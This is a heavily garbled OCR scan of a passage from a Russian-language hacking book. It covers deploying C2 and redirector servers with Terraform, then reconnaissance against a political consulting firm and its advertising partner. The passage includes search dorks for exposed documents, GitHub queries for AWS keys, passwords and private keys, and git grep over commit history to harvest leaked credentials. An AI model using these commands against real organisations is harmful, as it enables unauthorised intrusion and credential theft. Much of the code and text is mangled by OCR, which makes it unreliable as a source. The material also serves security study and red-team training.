одно число, как показано в листинге 3.4, и сохранят здравый рассудок. 
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Листинг 3.4. Минимальный код для создания 10 экземпляров ЕС2 
с использованием Тегарюгт 


# паіп. ЁҒ 1ацпсһћіпод 10 ЕС2 ѕегуегѕ 
геѕоигсе "амѕ іпѕёапсе" "Баѕіс_ес2" { 
апі = "аті -0039с41а106230асЬ" 


соипф = 19 

іпѕЁапсе уре = "{2.тАсго" 
} 
Настройка сервера 


Пока что наш сервер слишком прост. Давайте настроим его, установив 


следующие свойства: 


е КЛЮЧ 55Н, чтобы мы могли администрировать его удаленно, что 


указано в ресурсе Теггаѓогт с именем амѕ_Кеу раіг; 


• набор правил брандмауэра, именуемых в А\МГ5 группы безопас- 
ности, для управления тем, каким серверам разрешено взаи- 
модействовать друг с другом и каким образом. Эта настройка 
определяется в ресурсе Теггаѓогт амз_зесиг\%у_дгоур. Группы 
безопасности должны быть привязаны к виртуальному частному 
облаку (ушиа| ргіуаѓе сІоџа, УРС), своего рода виртуализирован- 
ной сети. Воспользуйтесь стандартной версией, предложенной 


АМҮ; 


• общедоступный ІР-адрес, назначенный каждому серверу. 


В листинге 3.5 показан файл таіп.ЁҒ с заданными свойствами сер- 


вера. 


Листинг 3.5. Добавление некоторых свойств в таіп. ЁҒ 


# паіп.ЁҒ - совместим только с ТеггаҒогт 0.12 


# Копируем и вставляем наш открытый ключ 55Н 
Ө гезоигсе "амѕ Кеу раіг" "55һ Кеу" { 

Кеу пате = "муКеу" 

руБ1с_Кеу = "55һ-гѕа ААААВЗ№2аС1ус2ЕААА..." 
} 


# Пустой ресурс, т.к. АМЅ ҮРС по умолчанию уже существует 
геѕоигсе "амѕ деҒаџ1& үрс" "деРаш 4" { 


} 


# Правило брандмауэра, разрешающее 55Н только с ТР вашего опорного сервера 


# Любой исходящий трафик разрешен 

Ө гезоигсе "амѕ_ѕесигіїу дгоир" "55НАйтіп" { 
паме = "55НАатіп" 
аеѕсгіріоп = "55Н {га Ас" 
үрс ій = амѕ_деҒаџ1& урс.еҒаџ1+.4а 
іпдгеѕѕ { 
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Ғгот рогё = 0 
То рогі = 22 
ргоЁосо1 = "ср" 
сійг Б1оскѕ = ["123.123.123.123/32"] 
} 
едгеѕѕ { 
Ғгом_рогЁ = 
{о _рогї = 9 
ргоїосо1 = "-1" 
сійг Б1оскѕ = ["0.0.0.0/0"] 
} 
} 


9 


# Привязываем ключ 55Н Кеу и группу безопасности к нашему серверу Баѕіс_ес2 


геѕоигсе "амѕ іпѕёапсе" "Баѕіс_ес2" { 
апі = "аті -0039с41а106230асЬ" 
іпѕёапсе_Ёуре = "2. тісго" 


үрс_ѕесигіёу _дгоир 105 = амѕ_ѕесигіїу дгоир.55НАатіп. 1 
Ө Кеу пате = амѕ.55һ Кеу.ій 
аѕѕосіаёе риБ1іс_ ір _аййгеѕ5= "гие" 
гооЁ_Б1оск_еуісе { 
умоТиме_512е = "25" 
} 
} 


# Выводим на печать публичный ІР сервера 
оиЁриЁ "риБ1іс ір " { 
уа\џе = амѕ іпѕЁапсе.Баѕіс ес2.риБ1іс ір 


| 


Какя уже говорил, ресурс амѕ_Кеу _раіг Ө регистрирует на АМ/$ ключ 
55Н, который передается в сервер при первой загрузке. На каждый ре- 
сурс в ТеггаЮгт позже можно будет сослаться через его переменную 
Ір, которая становится доступной во время выполнения, - в данном 
случае это ам$.55Н_Кеу.14 Ө. Структура имени этих специальных пе- 
ременных всегда одна и та же: геѕоџгсеТуре. геѕоџгсећате.іпёегпа1 - 
МагіаБ1е. 

Ресурс амѕ_ѕесигі+у дгоџр Ө не представляет ничего нового, за ис- 
ключением, возможно, ссылки на УРС по умолчанию, которое явля- 
ется сегментом виртуальной сети, созданной А\М/5 (немного похоже 
на интерфейс маршрутизатора). Мы указали брандмауэру разрешить 
входящий 55Н-трафик только с нашего сервера. 

Затем запустите еще одну команду р1ап, чтобы убедиться, что все 
свойства и ресурсы соответствуют ожиданиям, как показано в лис- 
тинге 3.6. 


Листинг 3.6. Проверка правильности настройки свойств 


гооЕ@Воџпсе:~ /іпЁга# ёеггаҒогт Ёт && ЁеггаҒогт р1ап 
ТеггаҒогт ил регРогм {Ве Ғо1Лоиіпд асїіопѕ: 


56 Глава з 


# амѕ іпѕёапсе.Баѕіс ес2 мі11 Бе сгеаїей 
+ геѕоигсе "амѕ Кеу раіг" "55һ Кеу2" { 


+ 1а = (Кпомп аЁёег арр1у) 

+ Кеу пате = "тукеу2" 

+ риБ1іс_Кеу = "55һ-гѕа ААААВЗМ№аС1ус2..." 
} 


+ гезоигсе "амз_зесиг\у_дгоир" "55НАйтіп" { 
+ агп = (Кпомп аЁёег арр\у) 
+ дезсгар оп "Ѕ5Н адтАп гот Боџпсег" 
+ 14 (Кпомп аЁфег арр1у) 
- -сокращено- - 


} 


+ геѕоџгсе "амѕ іпѕёапсе" "Баѕіс_ес2" { 


+ аті = "аті -0039с41а106230асЬ" 
+ агп = (Кпоип аЁ%ег арр1у) 
+ аѕѕосіаёе риБ1іс_ ір аййгеѕ5 = {гие 
+ 14 = (Кпомп аЁёег арр1у) 
+ іпѕЁапсе #уре = "42. пАсго" 
--Ѕпір- - 


Р1ап: 3 +о айй, 0 фо сһапде, 0 фо йеѕігоу. 


Теггаѓогт создаст три ресурса. Прекрасно. 

В качестве последней детали вам нужно дать команду АМ устано- 
вить РосКег и запустить ваш контейнер М№еіпх, когда машина запуще- 
на и работает. Для выполнения сценария при первой загрузке маши- 
ны АМ использует пакет с1оџй-іпії, установленный в большинстве 
дистрибутивов Ипих. Фактически именнотак АМ внедряет на сервер 
открытый ключ, который мы определили ранее. Этот скрипт называ- 
ется изег_даЖа. 

Измените таіп.їҒ, чтобы добавить команды БазВ для установки 
РоскКег и выполнения контейнера, как показано в листинге 5.7. 


Листинг 3.7. Запуск контейнера из таіп.ЇҒ 


геѕоигсе "амѕ іпѕёапсе" "Баѕіс_ес2" { 
- -сокращено- - 
Ө иѕег Паїа = <<ЕОЕ 


#1! /Біп/Баѕћ 
РОМАІМ№= "мим. 11 пих -ирдаёе-раскеїѕ .огд"; 
С21Р="172.31.31.13"; 


Ѕ1еер 10 

ѕийо айа-арё-героѕіёогу \ 
"еБ [агсһ=ат64] ВЕЁрз: //аомп1оаа.роскег. сот/1іпих/иБипёи \ 
5(15Ь ге1еаѕе -сѕ) \ 
${аБе" 

арі ирдафе 
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арі іпѕёа11 -у роскег-се 

роскег гип -аЁі -р80:80 -р443:443 \ 

-е ”ОМАІМ№= "ммм. сиѕёотіотаіп. сот" \ 

-е С21р="$С21р" \ 

-\ /орё/Леїѕепсгурі: /еёс/Леёѕепсгурі \ 
ѕрагсҒ1ом/пдіпх 


ЕОЕ 
} 


Блок Е ОЕ ® содержит длинную строку, позволяющую легко вводить 
переменные среды, значения которых создаются другими ресурсами 
Теггаѓогт. В этом примере мы жестко задаем [Р-адрес и доменное имя 
С2, но в реальной жизни это будут результаты работы других ресурсов 
'Тетгаогт, отвечающих за развертывание внутренних серверов С2. 


Вместо жесткого кодирования доменного имени в лис- 
тинге 3.7 мы могли бы дополнительно предусмотреть автоматическое 
создание записей "№ и управление ими с помощью провайдера Мате- 
сһеар: ћіїрѕ;//9йһир.сот/ааатаеса;Леггајогт-ргоуіаег-патесһеар. 


Запуск сервера в работу 


Теперь вы готовы запустить сервер в работу с помощью простой ко- 
манды *еггаФогм арр1у, которая еще раз выдаст план и запросит руч- 
ное подтверждение, прежде чем связываться с АҮ для создания за- 
прошенных ресурсов: 


гоо{@Воипсе:-/1пРга# ёеггаҒогт Ёт && {еггаРогм арр1у 


амѕ_Кеу раіг.55һ_Кеу: Сгеа оп сотр1еёе аР%ег 05 [19=пуКеу2] 
аи_ЧеРац{_урс.деРаи\{: Моді Ғ\ісаїіопѕ сотр1еёе аЁ%ег 15 [ід=урс-Б95е4Ь#] 

- - сокращено- - 

амѕ_іпѕёапсе.Баѕіс_ес2: Сгеа пд... 

амѕ_іпѕёапсе.Баѕіс_ес2: Сгеа оп сотр1еёе аР%ег 32$ [14=1-08912е11843734а34] 


Арр1у сотр1еёе! Аеѕоџгсеѕ: 3 айдей, © сһапдей, 0 дез+гоуед. 
Оиїриёѕ: 


ру Ас ір = 63.хх.хх.105 


Потрясающе. Мы можем подключиться к экземпляру по $5Н, ис- 
пользуя имя пользователя по умолчанию ичБипфи и закрытый ключ 
55Н, чтобы убедиться, что все работает как надо: 


гоо{@Воипсе:-/1пга# $$ -1 .55һ/19 гѕа ибипи@63.хх.хх.105 
Ме1соте Ёо ИБипеи 18.04.2 175 (СМУ/Алих 4.15.0-1044-амѕ х86 64) 
ибипи@ір-172-31-30-190:~5 роскег рѕ 
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СОМТАТМЕВ Ір ТМАСЕ СОММАМО 
5923186##а5 ѕрагс#ом/поі... "/БАп/Баѕһ /ѕс..." 


Сервер работает идеально. Теперь, когда мы полностью автомати- 
зировали создание и настройку сервера, мы можем разгуляться вволю 
и продублировать этот фрагмент кода, чтобы создать столько серве- 
ров, сколько необходимо, с разными правилами брандмауэра, сцена- 
риями пользовательских данных и любыми другими настройками. 
Конечно, более цивилизованным подходом было бы обернуть код, ко- 
торый мы только что написали, в модуль Теггаѓогт и передавать ему 
различные параметры в соответствии с вашими потребностями, т. е. 
сделать глубокий рефакторинг кода. 

Я не буду подробно описывать процесс рефакторинга в этой и без того 
большой главе. Рефакторинг будет в основном косметическим, напри- 
мер определение переменных в отдельном файле, создание нескольких 
групп безопасности, передача частных ІР-адресов в качестве перемен- 
ных в сценариях пользовательских данных и т. д. Я надеюсь, что к насто- 
ящему времени у вас накопилось достаточно практических знаний, что- 
бы скачать окончательную рефакторинговую версию из репозитория 
СіїНир, ссылка на который приведена на странице книги по адресу им. 
поѕѓагсћ.сот/Һом-һаск-дһоѕ}, и поиграть с ней в свое удовольствие. 

Основная цель этой главы состояла в том, чтобы показать вам, что 
можно создать полностью работоспособную атакующую инфраструк- 
туру ровно за 60 секунд, ибо в этом и заключается вся мощь контей- 
нерной технологии: автоматическая воспроизводимость, которую не 
может дать никакое количество ручных манипуляций с интерфейса- 
ми провайдеров. 

А теперь разверните свои атакующие серверы всего несколькими 
командами: 


гооЁ@Воцпсе:~# 91% с1опе ваш_релозиторий 
гоо{@Воипсе:-# са іпЁга && ЁеггаҒогт іпіё 
#обновление некоторых переменных 
гоо{@Воипсе:-# ёеггаҒогт арр1у 

- -Сокращено- - 


Арр1у сотр1еёе! Аеѕоџгсеѕ: 7 а44ед, © спапдед, 0 Яеѕїгоуей. 
ОџёриЁѕ: 


пдіпх_ір_аййгеѕ5 = 63.хх.хх.105 
с2 1р аййгеѕ5 = 63.хх.хх.108 


Наконец-то ваша инфраструктура готова! 


Дополнительные ресурсы 


• Ознакомьтесь со статьей Тейлора Брауна (Тау]ог Вгомт) Вгіпеїп= Оо- 
скег го ИПпаом5 ОБеуеорег$ мий Ийпаом5 Ѕегуег Сопіаіпегѕ по адресу 
ВЕр ИДУ Ро М/Опи. 
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Найдите отличный пост о развертывании сред выполнения кон- 
тейнеров по адресу ћїїр;///ї.1у/22үВСру. 


Лиз Райс (117 Кісе) раскрывает секреты среды выполнения, про- 
граммируя ее в режиме реального времени в своем выступлении 
Вийаіп= а Сотатег рот 5сгасй іп Со, доступном на ҮоиџТиђе по 
адресу ћіїрѕ ;//уоиїѓи.БеЛА4гОрна. 

Скотт Лоу (Ѕ5сой оме) предлагает краткое практическое введение 
в сетевые пространства имен на ћіїрѕ ;//0109.5соїоуе.огд/. 

Жером Петаццони (Јёгӧте Рега27001) подробно рассказывает 


о пространствах имен, сэетоир$ и ОЕЅ на ҮоиТиђе: ћіїрѕ;//уоиѓи.Бе/ 
5К5і-№34іт8. 


ЧАСТЬ ІІ 


ЗА РАБОТУ! 


Вы вряд ли откроете что-то новое, не освоив как следует старое. 
Ричард Фейнман 


ПРАВИЛЬНАЯ АТАКА 
В КИБЕРПРОСТРАНСТВЕ 


Наши промежуточные серверы тихо гудят в дата-центре 

где-то в Европе. Наша атакующая инфраструктура с не- 

терпением ждет наш первый приказ. Прежде чем мы за- 

пустим множество инструментов для атак, о которых ре- 
гулярно пишут в рассылках шпо5ес, давайте потратим пару 
минут на то, чтобы понять, как на самом деле работает наша 
цель, политическая консалтинговая фирма Сбтеїѕсћ РоПсо. Какова ее 
бизнес-модель? 

Какие продукты и услуги она предоставляет? Такого рода инфор- 
мация укажет нам стратегическое направление и поможет сузить 
перечень целей для атаки. Постановка реальных и осязаемых целей 
вполне может стать нашей первой задачей. От их главного веб-сайта 
мути. этесзспроШсо.сот нам мало проку: это мешанина из маркетин- 
говых ключевых слов, которые имеют смысл только для посвящен- 
ных. Поэтому мы начнем с поиска более качественной общедоступ- 
ной информации. 


Знакомство с Сгеёѕсһ Роиїісо 


Чтобы лучше понять эту компанию, давайте откопаем каждую презен- 
тацию Ро\м’етРошЕ и РОЕ-документ, в которых упоминается «Сте{зсв 
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РоПЯсо» (СР). Бесценным союзником в этом поиске оказался сервис 
51іаеЅһаге (ИНр5/Имилм.$Иаезваге.пе!/). Многие люди просто забывают 
Удалить свои презентации после выступления или по умолчанию 
размещают их в открытом доступе, что дает нам массу информации 
(рис. 4.1). 


Тагдеіпо ..... ® № н) 

уоќѓегѕ, М ^^ 

Мот о Ф. 
© Нпдегрийи 
Ф 


{но ѕһоиіа уо 
соті Ріхе! сопуегѕіо 


Е | е Беїагдеіпо - Гоок-а 


® Сатраідп орітігаї 


Аифепсе Соокіеѕ 


{агдеііпо 


Үоиг аа 


Оеуісе 10 


ш Шу 


Рис. 4.1. Некоторые слайды презентаций Сгеїѕсћ Ро!іїісо 


ЅіаеЅһаге - это всего лишь один из примеров сервисов для раз- 
мещения документов, поэтому далее мы просматриваем интернет 
в поисках ресурсов, загруженных на самые популярные платформы 
для обмена файлами и совместной работы: 5си а, Соозе Бихе, рос- 
итеп(Соча и так далее. Следующие поисковые запросы существенно 
снизят перечень результатов в большинстве поисковых систем и сде- 
лают поиск более эффективным: 


# Сайт общедоступных документов боод1е Диска: 
$<Це:40с$.90091е.сом "Сбгеёѕсһ ро1і+ісо" 


# Документы на сайте боситепЕс1оџа.ог9 
ѕіёе:боситепёс1оџа.огд "бгеёѕсћ ро1і+ісо" 


# Документы, загруженные на сайт 5сгіБаӣ: 
ѕіёе:ѕсгіБа.сот "дгеёѕсһро11+ісо. сот" 


# Общедоступные презентации РомегРоіпё 
іпёехё: "бгеёѕсһћ ро со" Ғ\Леёуре:рріх 


# Общедоступные РОЕ- документы 
іпёехё: "бгеёѕсһћ ро11%ісо" Ғ\Леёуре:рӣғ 


# Документы .Яосх на веб-сайте СР 
іпёехё: "бгеёѕсһћ ро со" РДетфуре: досх 
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Скорее всего, вашей поисковой системой по умолчанию будет Соо- 
е1е, но вы можете добиться лучших результатов в других системах, 
таких как Үапаех, Ва1аи, Віпе и т. д., поскольку Соое, как правило, 
строже других соблюдает законы о нарушении авторских прав и мо- 
дерирует результаты поиска. 

Еще одним отличным источником информации о бизнесе компа- 
нии являются метапоисковые системы. Такие веб-сайты, как Үірру 
и В12паг, собирают информацию из различных общих и специализи- 
рованных поисковых систем, предоставляя хороший обзор недавней 
деятельности компании. 


Подборка ресурсов, доступных на һіїрѕ;//оѕіпіјгате- 
уүогк.сот/, является золотой жилой для любого аналитика источников 
открытой информации. Вы можете легко утонуть в данных, изучая 
и сопоставляя результаты сотен доступных там разведывательных 
инструментов и приложений. 


В результате начального поиска всплывает много интересных до- 
кументов, от отчетов фондов, в которых упоминается СР, до марке- 
тинговых предложений для директоров компаний. Просматривая эти 
данные вручную, мы делаем вывод, что основная услуга СР - создание 
профилей избирателей на основе множества входных данных. Затем 
эти профили избирателей изучаются и вводятся в алгоритм, который 
решает, какой шаг наиболее подходит для привлечения и удержания 
избирателя. 


Поиск скрытых отношений 


Алгоритмы СР обрабатывают данные, это ясно, но откуда берутся 
данные? Чтобы лучше понять СР, нам нужно знать ее ближайших 
партнеров. Какая бы компания или средство массовой информации 
ни предоставляли все эти данные, они должны тесно сотрудничать 
с СР. Множество документов намекают на существование как мини- 
мум двух основных каналов: 

Брокеры данных или платформы управления данными. Эти 
компании продают данные, полученные от телекоммуникационных 
компаний, эмитентов кредитных карт, интернет-магазинов, местных 
предприятий и многих других источников. 

Научные исследования и опросы. Похоже, что СР каким-то об- 
разом взаимодействует с населением, чтобы рассылать анкеты и со- 
бирать мнения. 

Хотя на основном веб-сайте СР реклама как способ охвата публики 
почти не упоминается, документы в формате РРЕ изобилуют ссыл- 
ками на конкретную рекламную платформу с огромным охватом как 
в социальных сетях, так и на сайтах традиционных медиа. Прямой 
связи с этой рекламной платформой нет, но благодаря тем самым 
сайтам социальных сетей, которые они так любят, мы обнаружили 
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ретвит, показанный на рис. 4.2, от Дженни, вице-президента по мар- 
кетингу в СР, судя по ее профилю в Туй(ет. 


Јеппу М. @јепә | м 
Сгеаї м/огК їват, уои {гу аге {Ве Без! 


МХВАЯѕ \хгааѕ-їг 
Оиг пем гопї-епа $Кт 15 сотріеѓе! Мом уои сап тападе уоцг сатарідпѕ 


апа ассеѕѕ герогїѕ іп опе ѕіпдіе іпќегѓасе: ѓсІ.буу/Е50Ко 
Моге іпїціїіме апа тоге еѓћсіепї {Пап еуеп 


Коми +һіѕ {Ргеаа 


Рис. 4.2. Характерный ретвит СР 


Ссылка в твите безобидно указывает на агентство онлайн-рекла- 
мы: МХК Ад5. Они размещают рекламу на всевозможных веб-сайтах, 
взимают плату за тысячу показов (СРМ) и спокойно занимаются свои- 
ми делишками по накачке сайтов тоннами рекламных объявлений. 

Если не считать этого эмоционального твита Дженни из СР, меж- 
ду двумя компаниями нет ни одной видимой связи; в Соое едва ли 
есть обратная ссылка. Так какая же между ними связь? Мы быстро 
разгадываем эту загадку, сверяясь с юридическими документами 
двух компаний на ћіїрѕ;//орепсогрогаїеѕ.сот/, базой данных компаний 
по всему миру и отличным ресурсом для поиска старых документов 
компаний, списков акционеров, связанных организаций и так далее. 
Оказывается, у МХК Ад и Стгеїѕсһ РоП@со в большинстве своем одни 
ите же директора и должностные лица - черт возьми, у них даже был 
один и тот же почтовый адрес пару лет назад. 

Такая тесная связь может быть очень выгодной для обеих компаний. 
МХК Ааѕ собирает необработанные данные о взаимодействии людей 
с типом продукта или брендом. Они знают, например, что человек 
с псевдонимом 835957а5е любит ружья и охоту. Они передают эти 
необработанные данные в СтезсЬ РоП@со, которые анализируют их 
и группируют в сегмент данных похожих профилей, помеченных как 
«люди, которым нравится оружие». Затем СР может создавать слога- 
ны и видеоролики, чтобы убедить население, обозначенное как «люди, 
которым нравится оружие», в том, что их право на владение оружием 
находится под угрозой, если они не проголосуют за правильного кан- 
дидата. Клиент СР, баллотирующийся на какую-то значимую полити- 
ческую должность, доволен и начинает мечтать о ваннах с шампан- 
ским в Капитолии, в то время как СР продвигает эту рекламу на всех 
медиаплатформах с работающим веб-сайтом. Конечно, МХК А45 так- 
же получает свою долю рекламы для распространения в собственной 
сети, тем самым замыкая кольцо прибыли. Мои поздравления. 

Исходя из этой тесной связи, мы можем обоснованно подозревать, 
что успешный взлом МХЕ А4$ или СР может оказаться фатальным для 
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обеих компаний. Их совместное использование данных подразуме- 
вает некую связь или канал обмена, которые мы можем использовать 
для перехода от одной компании к другой. Наша потенциальная по- 
верхность атаки только что расширилась. 

Теперь, когда у нас есть первое, хотя и очень поверхностное, знание 
о методах работы компании, мы можем попробовать найти ответы на 
некоторые интересные вопросы: 


• насколько точны эти сегменты данных? Нацелены ли они на боль- 
шую сеть, скажем на всех людей в возрасте от 18 до 50 лет, или они 
могут детализовать самые интимные привычки человека? 


® кто является клиентами СР? Я имею в виду не милых пони, ко- 
торых они рекламируют на своих слайдах, таких как организа- 
ции здравоохранения, распространяющие целебные вакцины, 
а настоящих уродливых жаб, которых они прячут в своих базах 
данных; 


• и наконец, как работают эти рекламные материалы и объявле- 
ния? Это может показаться тривиальным вопросом, но, посколь- 
ку они якобы адаптированы для каждой целевой группы, трудно 
обеспечить какой-либо уровень прозрачности и подотчетности. 


У Зейнепа Туфекчи есть отличное выступление на 
ТЕР под названием «Мы создаем антиутопию только для того, чтобы 
люди нажимали на рекламу» об антиутопической реальности, поощря- 
емой онлайн-рекламой. 


В следующих нескольких главах я попытаюсь ответить на эти во- 
просы. Повестка дня довольно амбициозна, поэтому я надеюсь, что 
вы так же, как и я, взволнованы предстоящим погружением в этот 
странный мир сбора данных и обмана. 


Просеивание СієНиБ 


Повторяющимся лейтмотивом почти каждой презентации методоло- 
гии Стеїѕсһ Ро со и МХЕ Ааѕ являются их инвестиции в исследования 
и дизайн, а также их собственные алгоритмы машинного обучения. 
Такие ориентированные на технологии компании, вероятно, будут 
публиковать определенные порции исходного кода в общедоступных 
репозиториях для различных целей, например как небольшой вклад 
в мир открытого исходного кода, используемый в качестве приманки 
для ловли талантов, частичная документация некоторых АРІ, образ- 
цы кода ит. д. Если нам повезет, то мы можем найти какой-то матери- 
ал, который содержит пропущенный пароль или конфиденциальную 
ссылку на их платформу управления. Скрестим пальцы на удачу! 
Поиск в общедоступных репозиториях на СііНир довольно прост; 
вам даже не нужно регистрировать бесплатную учетную запись. Прос- 
то продолжайте искать ключевые слова, такие как «Сгеіѕсһ Росо» 
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и «МХЕ Ад$5». На рис. 4.3 показаны результаты поиска репозитория 
МХК АЯ. 


тхгааѕ Ѕеагсһ 
Кероѕіќогіеѕ «9 159 героѕіїогу геѕиіїѕ Ѕогі Веѕ! таїсћ ~ 
Соде 


В тхгадѕ/Ргоаисё-гоаатар 


С 16 
тп х |и{егпа! МХК Адз Ргоаисі Воадтар 
| ввие5 \Ж10 Фнтме міт ісепѕе Орааќеа 10 дауз адо 


Рис. 4.3. Репозиторий МХК Аа на СіїНир 


Одна компания со 159 публичными репозиториями? Пожалуй, 
это много. После беглого осмотра становится ясно, что только пол- 
дюжины этих репозиториев на самом деле принадлежат либо МХА 
Ааѕ, либо одному из их сотрудников. Остальные - это просто форки 
(скопированные репозитории), которые случайно упоминают МХЕ 
Ааѕ, например, в списках блокировки рекламы. Эти ответвления от 
оригинальных репозиториев не приносят никакой пользы, поэтому 
мы сосредоточимся непосредственно на полудюжине оригинальных 
репозиториев. К счастью, СііНир предлагает несколько шаблонов для 
отсеивания нежелательного вывода. Используя два поисковых пре- 
фикса огд: и геро:, мы можем ограничить область результатов не- 
сколькими учетными записями и репозиториями, которые мы счи- 
таем релевантными. 

Мы начинаем искать жестко вписанные в код секреты, такие как 
пароли $01, ключи доступа АҮ, закрытые ключи Соое С]оча, токе- 
ны АРІ и тестовые аккаунты, на рекламной платформе компании. По 
сути, нам нужно все, что может предоставить хоть какой-то первый 
доступ к секретам компании. 

Вводим эти запросы в поиск СИНи и смотрим, что получится: 


# Пример запросов СіЁНиБ 

огд:мхгАЧ$ раз$мог@ 

огд:тхгАйѕ амѕ ѕесгеЁ ассеѕѕ Кеу 
огд:тхгАд$ амѕ Кеу 

огд:тхгАдѕ ВЕСІМ АЅА РАІМАТЕ КЕҮ 
огд:тхгАд$ ВЕСІМ ОРЕМЗЗН РВІМАТЕ КЕУ 
огд:тхгАд$ ѕесгеЁ_Кеу 

ога: тхгАд$ һоокѕ.51аск.сот/ѕегуісеѕ 
ога: тхгАд$ ѕѕһраѕѕ -р 

ога: тхгАд$ ѕ90с5р 

огд:тхгАд$ арр$.90091еизегсопфеп*. сот 
огд:тхгАд$ ехёепѕіоп:рет Кеу 


Раздражающее ограничение поискового АРІ СИНиЬ заключает- 
ся в том, что он отфильтровывает специальные символы. Когда мы 
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ищем амѕ ѕЅесгеї_ассеѕѕ кеу, СИНиЬ возвращает любой фрагмент 
кода, соответствующий любому из четырех отдельных слов (ам$, 5е- 
сгеф, ассеѕѕ или Кеу). Это, наверное, единственный раз, когда я ис- 
кренне скучаю по регулярным выражениям. 


Альтернатива СИНиь, платформа Вііискеї не предо- 
ставляет аналогичную панель поиска. Она даже специально указывает 
поисковым системам пропускать ИВГ-адреса, содержащие изменения 
кода (известные как коммиты). Не беспокойтесь: российский поисковик 
Уапаех.ги имеет привычку игнорировать эти правила и с радостью по- 
кажет вам каждое мастер-дерево и историю коммитов в общедоступ- 
ных репозиториях Вірискеї, в ответ на поисковый запрос наподобие 
ѕііе:БіірискеЁ. ого іпиг1: таѕег. 


Имейте в виду, что эта фаза разведки заключается не только в сле- 
пом поиске пропущенных паролей; она также посвящена обнаруже- 
нию конечных точек ОКТ, и АРІ и ознакомлению с технологическими 
предпочтениями двух компаний. У каждой команды есть свои догмы 
о том, какой фреймворк использовать и на каком языке работать. Эта 
информация может позже пригодиться для корректировки нашей по- 
лезной нагрузки. 

К сожалению, предварительные поисковые запросы СіїНир не дали 
ничего стоящего, поэтому мы выкатываем на позицию большие пуш- 
ки и вообще обходим ограничения СііНир. Поскольку мы нацелены 
только на несколько репозиториев, мы загрузим все репозитории на 
диск, чтобы пустить в дело старый добрый дгер! 

Мы начнем с интересного списка из сотен шаблонов регулярных 
выражений (геғех), определенных в 5һһії, инструменте, специаль- 
но разработанном для поиска секретов в СИНиь, от обычных паро- 
лей до токенов АРІ (л05;//9іһир.соту/еіћ0і221е/һһді/). Сам инструмент 
также очень полезен для защитников, поскольку он помечает конфи- 
денциальные данные, отправленные на СИНиЪ, прослушивая собы- 
тия веб-перехватчика. Веб-перехватчик (мерһооК) - это вызов ОКІ- 
адреса после заданного события. В данном случае СИНиЬ отправляет 
запрос РОЅТ на предопределенную веб-страницу каждый раз, когда 
регулярное выражение соответствует строке в отправленном коде. 

Мы перерабатываем список паттернов, который можно найти на 
һіїрѕ:/Лму.һаскіікеаротѕіагсот/ѕесгеі гедех райегтѕ.іхї, чтобы сделать 
его удобным для дгер. Затем скачиваем все репозитории: 


гооє@Роіп1:~/# мһіЛе геаа р; до \ 
ді с1опе ммм. діЁҺоБ. сот/МХВайѕ /5р\ 
Чопе <115& героѕ.Ёхі 


И начинаем поисковую вечеринку: 


гооё@Роіпё1:~/# сиг1 -\$ 
һеерѕ : //9151.9ієћир. сот/НаскіікеАРогпѕёаг/ҒҒ2еабаа8е007850асс158еа3495е95# 
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> гедех_ра{{егп$. хе 
гоо&@Роіп1:~/# едгер -Ві -Р гедех_ра{егп$. хе * 


Эта сделанная на скорую руку команда будет искать каждый файл 
в загруженных репозиториях. Однако, поскольку мы имеем дело сре- 
позиториями СИ, едгер пропустит предыдущие версии кода, сжатые 
и спрятанные во внутренней структуре файловой системы СЁ (пап- 
ка .91#). Эти старые версии файлов, безусловно, являются самыми 
ценными активами! Вы только подумайте обо всех учетных данных, 
введенных по ошибке или жестко закодированных на ранних этапах 
проекта! Знаменитая фраза «Это просто временное исправление» ни- 
когда не была более фатальной, чем в репозитории системы управле- 
ния версиями. 

Команда 914 предоставляет необходимые инструменты, которые 
мы будем использовать, чтобы пройтись по закоулкам памяти ком- 
мита: 914 геу- 115%, дії 109, 914 геуег* и, что наиболее важно для нас, 
91+ дгер. В отличие от обычного дгер, 914 дгер ожидает идентифика- 
тор коммита, который мы предоставляем с помощью 91Ё геу-115$+. 
Объединив две команды с помощью хагд$ (расширенные аргументы), 
мы можем получить все идентификаторы коммитов (все изменения, 
когда-либо внесенные в репозиторий) и искать в каждой из них инте- 
ресные шаблоны с помощью 914 дгер: 


гооє@Роіпё1:~/# 91% геу-1151 --а Ц | хагд$ 91 дгер "ВЕСТМ [ЕС|АЅА [05А | ОРЕМЅ5Н] РАТУМАТЕ КЕҮ" 


Мы также могли бы автоматизировать этот поиск с помощью цикла 
БазВ или полностью положиться на такие инструменты, как С ШеаК$ 
(п11р5://айһиБ.соту/2гісеіћеғау/9іеакѕ/) или їги# еНое (№#р$/айПиБ.сот/ 
1ха4481/ЛгиеНод/), которые заботятся о просеивании всех файлов 
КОММИТОВ. 

После пары часов просеивания общедоступного исходного кода 
всеми возможными способами становится ясно одно: кажется, нигде 
нет жестко запрограммированных учетных данных. Не нашлось даже 
фиктивных учетных данных или тестового аккаунта, чтобы поощрить 
наш энтузиазм. Либо МХК АЯѕ и СР хороши в сокрытии секретов, либо 
нам просто не повезло. Ничего, идем дальше! 

Одной из особенностей СііНиБ, которую большинство людей склон- 
ны упускать из виду, является возможность делиться фрагментами 
кода на ћіірѕ;//9/5і.дііһир.со. Аналогичную услугу также предоставляет 
һірѕ://раѕіеђіп.сот/. Эти два веб-сайта, атакже другие, такие как ћїїрѕ;// 
соаереп.іо/, часто содержат фрагменты кода, выдержки из баз данных, 
сегменты данных, файлы конфигурации и все, чем разработчики хо- 
тят в спешке обменяться. Мы попытаемся что-нибудь найти на этих 
сайтах, используя определенные команды поисковой системы: 


# Документы на сайте 9151. о9і&һиЬ.сот: 
ѕ1е:915і.діЕһир. сом "тхгайѕ. сот" 
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# Документы на сайте Раз{е “пт: 
Це :разе\п.сом "тхгад$.сом" 


# Документы на сайте Эи${Раз*е. 1+: 
Це: ]у5раз{е.1{ "тхгад$.сом" 


# Документы на сайте РаѕїеЕ5: 
ѕіёе:раѕіеҒѕ.сот "тхгайѕ. сом" 


# Документы на сайте СойеРеп: 
Це: содереп.1о "тхгайѕ. сот" 


Один из поисковых запросов дает результат, показанный нарис. 4.4. 


Е маа / 9156а747с87350е547873{ее44ЬЛаз1еа! 


<> Сое Веуіѕіопѕ Етреа я <ѕсгірё эгс=" В+ 


Б15Е11е1 (Ех 


[{ "ҒогтаЁ" : "у", "иг1": "ВЕЕрз: //Фогта*-+гие-\1.да.еим1 .шхгад$ . сот", "Һаѕһ" : "с8864а63916861с6се4839с27 


Рис. 4.4. Фрагмент файла логов МХК Ааѕ 


Кажется, это выдержка из файла логов, который просто висит в от- 
крытом Сіѕї, доступном для всех желающих. Разве это не прекрасно? 
К сожалению, критически важная информация пока недоступна, но 
